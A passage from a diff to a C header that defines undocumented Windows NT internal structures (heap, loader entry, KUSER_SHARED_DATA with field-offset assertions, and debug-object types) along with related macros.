_RTL_TRACE_ENUMERATE { + PRTL_TRACE_DATABASE Database; + ULONG Index; + PRTL_TRACE_BLOCK Block; +} RTL_TRACE_ENUMERATE, * PRTL_TRACE_ENUMERATE; + +typedef struct _KLDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + PVOID ExceptionTable; + ULONG ExceptionTableSize; + PVOID GpValue; + struct _NON_PAGED_DEBUG_INFO* NonPagedDebugInfo; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT __Unused5; + PVOID SectionPointer; + ULONG CheckSum; + ULONG CoverageSectionSize; + PVOID CoverageSection; + PVOID LoadedImports; + PVOID PatchInformation; +} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; // + +#define RTL_HEAP_BUSY (USHORT)0x0001 +#define RTL_HEAP_SEGMENT (USHORT)0x0002 +#define RTL_HEAP_SETTABLE_VALUE (USHORT)0x0010 +#define RTL_HEAP_SETTABLE_FLAG1 (USHORT)0x0020 +#define RTL_HEAP_SETTABLE_FLAG2 (USHORT)0x0040 +#define RTL_HEAP_SETTABLE_FLAG3 (USHORT)0x0080 +#define RTL_HEAP_SETTABLE_FLAGS (USHORT)0x00E0 +#define RTL_HEAP_UNCOMMITTED_RANGE (USHORT)0x0100 +#define RTL_HEAP_PROTECTED_ENTRY (USHORT)0x0200 + +#pragma warning(disable: 4273) // nconsistent dll linkage (winnt.h) + +typedef struct _DISPATCHER_HEADER +{ + union + { + struct + { + UCHAR Type; + union + { + UCHAR Absolute; + UCHAR NpxIrql; + }; + + union + { + UCHAR Size; + UCHAR Hand; + }; + + union + { + UCHAR Inserted; + BOOLEAN DebugActive; + }; + + }; // struct .. + volatile LONG Lock; + }; // first union .. + + LONG SignalState; + LIST_ENTRY WaitListHead; +} DISPATCHER_HEADER, *PDISPATCHER_HEADER; + +typedef struct _KEVENT +{ + DISPATCHER_HEADER Header; +} KEVENT, *PKEVENT, *PRKEVENT; + +typedef struct _KGATE +{ + DISPATCHER_HEADER Header; +} KGATE, *PKGATE; + +typedef struct _KSEMAPHORE +{ + DISPATCHER_HEADER Header; + LONG Limit; +} KSEMAPHORE, *PKSEMAPHORE; // + +typedef struct _OWNER_ENTRY +{ + ULONG OwnerThread; + LONG OwnerCount; + ULONG TableSize; +} OWNER_ENTRY, *POWNER_ENTRY; // + +typedef struct _ERESOURCE +{ + LIST_ENTRY SystemResourcesList; + OWNER_ENTRY* OwnerTable; + SHORT ActiveCount; + USHORT Flag; + KSEMAPHORE* SharedWaiters; + KEVENT* ExclusiveWaiters; + OWNER_ENTRY OwnerEntry; + ULONG ActiveEntries; + ULONG ContentionCount; + ULONG NumberOfSharedWaiters; + ULONG NumberOfExclusiveWaiters; + PVOID Address; + ULONG CreatorBackTraceIndex; + ULONG SpinLock; +} ERESOURCE, *PERESOURCE; // + +#define SET_LAST_STATUS(S)NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(NtCurrentTeb()->LastStatusValue = (ULONG)(S)) + +#define HEAP_GRANULARITY (sizeof( HEAP_ENTRY )) +#define HEAP_GRANULARITY_SHIFT 3 + +#define HEAP_MAXIMUM_BLOCK_SIZE (USHORT)(((0x10000 << HEAP_GRANULARITY_SHIFT) - PAGE_SIZE) >> HEAP_GRANULARITY_SHIFT) + +#define HEAP_MAXIMUM_FREELISTS 128 +#define HEAP_MAXIMUM_SEGMENTS 16 + +#define HEAP_ENTRY_BUSY 0x01 +#define HEAP_ENTRY_EXTRA_PRESENT 0x02 +#define HEAP_ENTRY_FILL_PATTERN 0x04 +#define HEAP_ENTRY_VIRTUAL_ALLOC 0x08 +#define HEAP_ENTRY_LAST_ENTRY 0x10 +#define HEAP_ENTRY_SETTABLE_FLAG1 0x20 +#define HEAP_ENTRY_SETTABLE_FLAG2 0x40 +#define HEAP_ENTRY_SETTABLE_FLAG3 0x80 +#define HEAP_ENTRY_SETTABLE_FLAGS 0xE0 + +typedef struct _HEAP_LOCK +{ + union + { + RTL_CRITICAL_SECTION CriticalSection; + ERESOURCE Resource; + } Lock; +} HEAP_LOCK, *PHEAP_LOCK; + +typedef struct _HEAP_TUNING_PARAMETERS +{ + ULONG CommittThresholdShift; + ULONG MaxPreCommittThreshold; +} HEAP_TUNING_PARAMETERS, *PHEAP_TUNING_PARAMETERS; // + +typedef struct _HEAP_PSEUDO_TAG_ENTRY +{ + ULONG Allocs; + ULONG Frees; + ULONG Size; +} HEAP_PSEUDO_TAG_ENTRY, *PHEAP_PSEUDO_TAG_ENTRY; // + +typedef struct _HEAP_TAG_ENTRY +{ + ULONG Allocs; + ULONG Frees; + ULONG Size; + USHORT TagIndex; + USHORT CreatorBackTraceIndex; + WCHAR TagName[ 24 ]; +} HEAP_TAG_ENTRY, *PHEAP_TAG_ENTRY; // + +typedef struct _HEAP_ENTRY +{ + USHORT Size; + UCHAR Flags; + UCHAR SmallTagIndex; + PVOID SubSegmentCode; + USHORT PreviousSize; + UCHAR SegmentOffset; + UCHAR LFHFlags; + UCHAR UnusedBytes; + USHORT FunctionIndex; + USHORT ContextValue; + ULONG InterceptorValue; + USHORT UnusedBytesLength; + UCHAR EntryOffset; + UCHAR ExtendedBlockSignature; + ULONG Code1; + USHORT Code2; + UCHAR Code3; + UCHAR Code4; + ULONG64 AgregateCode; +} HEAP_ENTRY, *PHEAP_ENTRY; + +typedef struct _HEAP_COUNTERS +{ + ULONG TotalMemoryReserved; + ULONG TotalMemoryCommitted; + ULONG TotalMemoryLargeUCR; + ULONG TotalSizeInVirtualBlocks; + ULONG TotalSegments; + ULONG TotalUCRs; + ULONG CommittOps; + ULONG DeCommitOps; + ULONG LockAcquires; + ULONG LockCollisions; + ULONG CommitRate; + ULONG DecommittRate; + ULONG CommitFailures; + ULONG InBlockCommitFailures; + ULONG CompactHeapCalls; + ULONG CompactedUCRs; + ULONG InBlockDeccommits; + ULONG InBlockDeccomitSize; +} HEAP_COUNTERS, *PHEAP_COUNTERS; // + +typedef struct _HEAP +{ + HEAP_ENTRY Entry; + ULONG SegmentSignature; + ULONG SegmentFlags; + LIST_ENTRY SegmentListEntry; + struct _HEAP* Heap; + PVOID BaseAddress; + ULONG NumberOfPages; + PHEAP_ENTRY FirstEntry; + PHEAP_ENTRY LastValidEntry; + ULONG NumberOfUnCommittedPages; + ULONG NumberOfUnCommittedRanges; + USHORT SegmentAllocatorBackTraceIndex; + USHORT Reserved; + LIST_ENTRY UCRSegmentList; + ULONG Flags; + ULONG ForceFlags; + ULONG CompatibilityFlags; + ULONG EncodeFlagMask; + HEAP_ENTRY Encoding; + ULONG PointerKey; + ULONG Interceptor; + ULONG VirtualMemoryThreshold; + ULONG Signature; + ULONG SegmentReserve; + ULONG SegmentCommit; + ULONG DeCommitFreeBlockThreshold; + ULONG DeCommitTotalFreeThreshold; + ULONG TotalFreeSize; + ULONG MaximumAllocationSize; + USHORT ProcessHeapsListIndex; + USHORT HeaderValidateLength; + PVOID HeaderValidateCopy; + USHORT NextAvailableTagIndex; + USHORT MaximumTagIndex; + PHEAP_TAG_ENTRY TagEntries; + LIST_ENTRY UCRList; + ULONG AlignRound; + ULONG AlignMask; + LIST_ENTRY VirtualAllocdBlocks; + LIST_ENTRY SegmentList; + USHORT AllocatorBackTraceIndex; + ULONG NonDedicatedListLength; + PVOID BlocksIndex; + PVOID UCRIndex; + PHEAP_PSEUDO_TAG_ENTRY PseudoTagEntries; + LIST_ENTRY FreeLists; + PHEAP_LOCK LockVariable; + LONG * CommitRoutine; // <<-- http://www.nirsoft.net/kernel_struct/vista/HEAP.html + PVOID FrontEndHeap; + USHORT FrontHeapLockCount; + UCHAR FrontEndHeapType; + HEAP_COUNTERS Counters; + HEAP_TUNING_PARAMETERS TuningParameters; +} HEAP, *PHEAP; // + +typedef struct _HEAP_FREE_ENTRY_EXTRA +{ + USHORT TagIndex; + USHORT FreeBackTraceIndex; +} HEAP_FREE_ENTRY_EXTRA, *PHEAP_FREE_ENTRY_EXTRA; // + +typedef struct _HEAP_ENTRY_EXTRA +{ + USHORT AllocatorBackTraceIndex; + USHORT TagIndex; + ULONG Settable; + ULONG64 ZeroInit; +} HEAP_ENTRY_EXTRA, *PHEAP_ENTRY_EXTRA; // + +typedef struct _HEAP_VIRTUAL_ALLOC_ENTRY +{ + LIST_ENTRY Entry; + HEAP_ENTRY_EXTRA ExtraStuff; + ULONG CommitSize; + ULONG ReserveSize; + HEAP_ENTRY BusyBlock; +} HEAP_VIRTUAL_ALLOC_ENTRY, *PHEAP_VIRTUAL_ALLOC_ENTRY; // + +// +// Known extended CPU state feature IDs +// + +// #define XSTATE_LEGACY_FLOATING_POINT 0 +// #define XSTATE_LEGACY_SSE 1 +// #define XSTATE_GSSE 2 +// +// #define XSTATE_MASK_LEGACY_FLOATING_POINT (1i64 << (XSTATE_LEGACY_FLOATING_POINT)) +// #define XSTATE_MASK_LEGACY_SSE (1i64 << (XSTATE_LEGACY_SSE)) +// #define XSTATE_MASK_LEGACY (XSTATE_MASK_LEGACY_FLOATING_POINT | XSTATE_MASK_LEGACY_SSE) +// #define XSTATE_MASK_GSSE (1i64 << (XSTATE_GSSE)) +// +// #define MAXIMUM_XSTATE_FEATURES 64 + + +typedef enum _HARDERROR_RESPONSE_OPTION +{ + OptionAbortRetryIgnore, + OptionOk, + OptionOkCancel, + OptionRetryCancel, + OptionYesNo, + OptionYesNoCancel, + OptionShutdownSystem, + OptionOkNoWait, + OptionCancelTryContinue +} HARDERROR_RESPONSE_OPTION; + +typedef enum _HARDERROR_RESPONSE +{ + ResponseReturnToCaller, + ResponseNotHandled, + ResponseAbort, + ResponseCancel, + ResponseIgnore, + ResponseNo, + ResponseOk, + ResponseRetry, + ResponseYes, + ResponseTryAgain, + ResponseContinue +} HARDERROR_RESPONSE; + +typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE +{ + StandardDesign, // None == 0 == standard design + NEC98x86, // NEC PC98xx series on X86 + EndAlternatives // past end of known alternatives +} ALTERNATIVE_ARCHITECTURE_TYPE; + +#define NX_SUPPORT_POLICY_ALWAYSOFF 0 +#define NX_SUPPORT_POLICY_ALWAYSON 1 +#define NX_SUPPORT_POLICY_OPTIN 2 +#define NX_SUPPORT_POLICY_OPTOUT 3 + +#define PROCESSOR_FEATURE_MAX 64 +#define MAX_WOW64_SHARED_ENTRIES 16 + +#if defined(_MSC_VER) && (_MSC_VER < 1300) + +#define XSTATE_LEGACY_FLOATING_POINT 0 +#define XSTATE_LEGACY_SSE 1 +#define XSTATE_GSSE 2 + +#define XSTATE_MASK_LEGACY_FLOATING_POINT (1i64 << (XSTATE_LEGACY_FLOATING_POINT)) +#define XSTATE_MASK_LEGACY_SSE (1i64 << (XSTATE_LEGACY_SSE)) +#define XSTATE_MASK_LEGACY (XSTATE_MASK_LEGACY_FLOATING_POINT | XSTATE_MASK_LEGACY_SSE) +#define XSTATE_MASK_GSSE (1i64 << (XSTATE_GSSE)) + +#define MAXIMUM_XSTATE_FEATURES 64 + +// +// Extended processor state configuration +// +#if defined(_WINNT_) && defined(_MSC_VER) && _MSC_VER < 1300 +typedef struct _XSTATE_FEATURE { + DWORD Offset; + DWORD Size; +} XSTATE_FEATURE, *PXSTATE_FEATURE; + +typedef struct _XSTATE_CONFIGURATION { + // Mask of enabled features + DWORD64 EnabledFeatures; + + // Total size of the save area + DWORD Size; + + DWORD OptimizedSave : 1; + + // List of features ( + XSTATE_FEATURE Features[MAXIMUM_XSTATE_FEATURES]; + +} XSTATE_CONFIGURATION, *PXSTATE_CONFIGURATION; +#endif + +#ifndef _WINDOWS_ +typedef enum _HEAP_INFORMATION_CLASS { + HeapCompatibilityInformation +} HEAP_INFORMATION_CLASS; +#endif //_WINDOWS_ + +#endif + +typedef struct _KUSER_SHARED_DATA +{ + ULONG TickCountLowDeprecated; + ULONG TickCountMultiplier; + + volatile KSYSTEM_TIME InterruptTime; + volatile KSYSTEM_TIME SystemTime; + volatile KSYSTEM_TIME TimeZoneBias; + + USHORT ImageNumberLow; + USHORT ImageNumberHigh; + + WCHAR NtSystemRoot[260]; + + ULONG MaxStackTraceDepth; + + ULONG CryptoExponent; + + ULONG TimeZoneId; + ULONG LargePageMinimum; + ULONG Reserved2[7]; + + ULONG NtProductType; + BOOLEAN ProductTypeIsValid; + + ULONG NtMajorVersion; + ULONG NtMinorVersion; + + BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX]; + + ULONG Reserved1; + ULONG Reserved3; + + volatile ULONG TimeSlip; + + ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture; + + LARGE_INTEGER SystemExpirationDate; + + ULONG SuiteMask; + + BOOLEAN KdDebuggerEnabled; + + UCHAR NXSupportPolicy; + + volatile ULONG ActiveConsoleId; + + volatile ULONG DismountCount; + + ULONG ComPlusPackage; + + ULONG LastSystemRITEventTickCount; + + ULONG NumberOfPhysicalPages; + + BOOLEAN SafeBootMode; + union + { + UCHAR TscQpcData; + struct + { + UCHAR TscQpcEnabled : 1; + UCHAR TscQpcSpareFlag : 1; + UCHAR TscQpcShift : 6; + }; + }; + UCHAR TscQpcPad[2]; + + union + { + ULONG TraceLogging; + ULONG SharedDataFlags; + struct + { + ULONG DbgErrorPortPresent : 1; + ULONG DbgElevationEnabled : 1; + ULONG DbgVirtEnabled : 1; + ULONG DbgInstallerDetectEnabled : 1; + ULONG DbgSystemDllRelocated : 1; + ULONG DbgDynProcessorEnabled : 1; + ULONG DbgSEHValidationEnabled : 1; + ULONG SpareBits : 25; + }; + }; + ULONG DataFlagsPad[1]; + + ULONGLONG TestRetInstruction; + ULONG SystemCall; + ULONG SystemCallReturn; + ULONGLONG SystemCallPad[3]; + + union + { + volatile KSYSTEM_TIME TickCount; + volatile ULONG64 TickCountQuad; + struct + { + ULONG ReservedTickCountOverlay[3]; + ULONG TickCountPad[1]; + }; + }; + + ULONG Cookie; + + // Entries below all invalid below Windows Vista + + ULONG CookiePad[1]; + + LONGLONG ConsoleSessionForegroundProcessId; + + ULONG Wow64SharedInformation[MAX_WOW64_SHARED_ENTRIES]; + + USHORT UserModeGlobalLogger[16]; + ULONG ImageFileExecutionOptions; + + ULONG LangGenerationCount; + + union + { + ULONGLONG AffinityPad; // only valid on Windows Vista + ULONG_PTR ActiveProcessorAffinity; // only valid on Windows Vista + ULONGLONG Reserved5; + }; + volatile ULONG64 InterruptTimeBias; + volatile ULONG64 TscQpcBias; + + volatile ULONG ActiveProcessorCount; + volatile USHORT ActiveGroupCount; + USHORT Reserved4; + + volatile ULONG AitSamplingValue; + volatile ULONG AppCompatFlag; + + ULONGLONG SystemDllNativeRelocation; + ULONG SystemDllWowRelocation; + + ULONG XStatePad[1]; + XSTATE_CONFIGURATION XState; +} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA; + +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x14); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x20); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x2c); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x2e); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x30); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved2) == 0x248); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NXSupportPolicy) == 0x2d5); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dC); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TraceLogging) == 0x2f0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x300); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallReturn) == 0x304); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x308); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Wow64SharedInformation) == 0x340); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved5) == 0x3a8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TscQpcBias) == 0x3b8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3c6); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x3c8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x3cc); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemDllNativeRelocation) == 0x3d0); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemDllWowRelocation) == 0x3d8); +C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3e0); + +#define SHARED_USER_DATA_VA 0x7FFE0000 +#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)SHARED_USER_DATA_VA) + +__inline struct _KUSER_SHARED_DATA * GetKUserSharedData() { return (USER_SHARED_DATA); } + +__forceinline ULONG NtGetTickCount() { return (ULONG) ((USER_SHARED_DATA->TickCountQuad * USER_SHARED_DATA->TickCountMultiplier) >> 24); } + +//added 20/03/2011 +#define RTL_CLONE_PROCESS_FLAGS_CREATE_SUSPENDED 0x00000001 +#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002 +#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004 + +//added 20/03/2011 +typedef struct _RTL_PROCESS_REFLECTION_INFORMATION +{ + HANDLE Process; + HANDLE Thread; + CLIENT_ID ClientId; +} RTL_PROCESS_REFLECTION_INFORMATION, *PRTL_PROCESS_REFLECTION_INFORMATION; + +//FIXED 21.02.2011 size for x64 +typedef struct _VM_COUNTERS { + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivatePageCount; +} VM_COUNTERS; +typedef VM_COUNTERS *PVM_COUNTERS; + +#if (_MSC_VER < 1300) && !defined(_WINDOWS_) +typedef struct _IO_COUNTERS { + ULONGLONG ReadOperationCount; + ULONGLONG WriteOperationCount; + ULONGLONG OtherOperationCount; + ULONGLONG ReadTransferCount; + ULONGLONG WriteTransferCount; + ULONGLONG OtherTransferCount; +} IO_COUNTERS; +typedef IO_COUNTERS *PIO_COUNTERS; +#endif + +// SystemProcessesAndThreadsInformation +//FIXED 21.02.2011 size for x64 (and as well for x86 too) +typedef struct _SYSTEM_PROCESSES_INFORMATION { + ULONG NextEntryDelta; + ULONG ThreadCount; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + HANDLE UniqueProcessId; + HANDLE InheritedFromUniqueProcessId; + ULONG HandleCount; + ULONG SessionId; + ULONG_PTR PageDirectoryBase; + VM_COUNTERS VmCounters; + IO_COUNTERS IoCounters; + SYSTEM_THREAD_INFORMATION Threads[1]; +} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; + +#define SIZEOF_BP_BUFFER 32 +#define LPC_BUFFER_SIZE 0x130 + +typedef struct _DBGKM_EXCEPTION +{ + EXCEPTION_RECORD ExceptionRecord; + ULONG FirstChance; +} DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; + +typedef struct _DBGKM_CREATE_THREAD +{ + ULONG SubSystemKey; + PVOID StartAddress; +} DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; + +typedef struct _DBGKM_CREATE_PROCESS +{ + ULONG SubSystemKey; + HANDLE FileHandle; + PVOID BaseOfImage; + ULONG DebugInfoFileOffset; + ULONG DebugInfoSize; + DBGKM_CREATE_THREAD InitialThread; +} DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; + +typedef struct _DBGKM_EXIT_THREAD +{ + NTSTATUS ExitStatus; +} DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; + +typedef struct _DBGKM_EXIT_PROCESS +{ + NTSTATUS ExitStatus; +} DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; + +typedef struct _DBGKM_LOAD_DLL +{ + HANDLE FileHandle; + PVOID BaseOfDll; + ULONG DebugInfoFileOffset; + ULONG DebugInfoSize; + PVOID NamePointer; +} DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; + +typedef struct _DBGKM_UNLOAD_DLL +{ + PVOID BaseAddress; +} DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; + +typedef enum _DBG_STATE +{ + DbgIdle, + DbgReplyPending, + DbgCreateThreadStateChange, + DbgCreateProcessStateChange, + DbgExitThreadStateChange, + DbgExitProcessStateChange, + DbgExceptionStateChange, + DbgBreakpointStateChange, + DbgSingleStepStateChange, + DbgLoadDllStateChange, + DbgUnloadDllStateChange +} DBG_STATE, *PDBG_STATE; + +typedef struct _DBGUI_CREATE_THREAD +{ + HANDLE HandleToThread; + DBGKM_CREATE_THREAD NewThread; +} DBGUI_CREATE_THREAD, *PDBGUI_CREATE_THREAD; + +typedef struct _DBGUI_CREATE_PROCESS +{ + HANDLE HandleToProcess; + HANDLE HandleToThread; + DBGKM_CREATE_PROCESS NewProcess; +} DBGUI_CREATE_PROCESS, *PDBGUI_CREATE_PROCESS; + +typedef struct _DBGUI_WAIT_STATE_CHANGE +{ + DBG_STATE NewState; + CLIENT_ID AppClientId; + union + { + DBGKM_EXCEPTION Exception; + DBGUI_CREATE_THREAD CreateThread; + DBGUI_CREATE_PROCESS CreateProcessInfo; + DBGKM_EXIT_THREAD ExitThread; + DBGKM_EXIT_PROCESS ExitProcess; + DBGKM_LOAD_DLL LoadDll; + DBGKM_UNLOAD_DLL UnloadDll; + } StateInfo; +} DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; + +#define DEBUG_READ_EVENT 0x0001 +#define DEBUG_PROCESS_ASSIGN 0x0002 +#define DEBUG_SET_INFORMATION 0x0004 +#define DEBUG_QUERY_INFORMATION 0x0008 +#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | \ + DEBUG_READ_EVENT | DEBUG_PROCESS_ASSIGN | DEBUG_SET_INFORMATION | \ + DEBUG_QUERY_INFORMATION) + +#define DEBUG_KILL_ON_CLOSE 0x1 + +typedef enum _DEBUGOBJECTINFOCLASS +{ + DebugObjectFlags = 1, + MaxDebugObjectInfoClass +} DEBUGOBJECTINFOCLASS, *PDEBUGOBJECTINFOCLASS; + + +//added 21/03/2011 +//begin +typedef struct _RTL_HEAP_TAG_INFO +{ + ULONG NumberOfAllocations; + ULONG NumberOfFrees; + SIZE_T BytesAllocated; +} RTL_HEAP_TAG_INFO, *PRTL_HEAP_TAG_INFO; + +#define RTL_HEAP_MAKE_TAG HEAP_MAKE_TAG_FLAGS +#define MAKE_TAG( t ) (RTL_HEAP_MAKE_TAG( NtdllBaseTag, t )) + +typedef NTSTATUS (NTAPI *PRTL_ENUM_HEAPS_ROUTINE)( + IN PVOID HeapHandle, + IN PVOID Parameter + ); + +typedef struct _RTL_HEAP_USAGE_ENTRY +{ + struct _RTL_HEAP_USAGE_ENTRY *Next; + PVOID Address; + SIZE_T Size; + USHORT AllocatorBackTraceIndex; + USHORT TagIndex; +} RTL_HEAP_USAGE_ENTRY, *PRTL_HEAP_USAGE_ENTRY; + +typedef struct _RTL_HEAP_USAGE +{ + ULONG Length; + SIZE_T BytesAllocated; + SIZE_T BytesCommitted; + SIZE_T BytesReserved; + SIZE_T BytesReservedMaximum; + PRTL_HEAP_USAGE_ENTRY Entries; + PRTL_HEAP_USAGE_ENTRY AddedEntries; + PRTL_HEAP_USAGE_ENTRY RemovedEntries; + ULONG_PTR Reserved[8]; +} RTL_HEAP_USAGE, *PRTL_HEAP_USAGE; + +#define HEAP_USAGE_ALLOCATED_BLOCKS HEAP_REALLOC_IN_PLACE_ONLY +#define HEAP_USAGE_FREE_BUFFER HEAP_ZERO_MEMORY + +typedef struct _RTL_HEAP_WALK_ENTRY +{ + PVOID DataAddress; + SIZE_T DataSize; + UCHAR OverheadBytes; + UCHAR SegmentIndex; + USHORT Flags; + union + { + struct + { + SIZE_T Settable; + USHORT TagIndex; + USHORT AllocatorBackTraceIndex; + ULONG Reserved[2]; + } Block; + struct + { + ULONG CommittedSize; + ULONG UnCommittedSize; + PVOID FirstEntry; + PVOID LastEntry; + } Segment; + }; +} RTL_HEAP_WALK_ENTRY, *PRTL_HEAP_WALK_ENTRY; + +#define HeapDebuggingInformation 0x80000002 + +typedef NTSTATUS (NTAPI *PRTL_HEAP_LEAK_ENUMERATION_ROUTINE)( + IN LONG Reserved, + IN PVOID HeapHandle, + IN PVOID BaseAddress, + IN SIZE_T BlockSize, + IN ULONG StackTraceDepth, + IN PVOID *StackTrace + ); + +typedef struct _HEAP_DEBUGGING_INFORMATION +{ + PVOID InterceptorFunction; + USHORT InterceptorValue; + ULONG ExtendedOptions; + ULONG StackTraceDepth; + SIZE_T MinTotalBlockSize; + SIZE_T MaxTotalBlockSize; + PRTL_HEAP_LEAK_ENUMERATION_ROUTINE HeapLeakEnumerationRoutine; +} HEAP_DEBUGGING_INFORMATION, *PHEAP_DEBUGGING_INFORMATION; + +// added 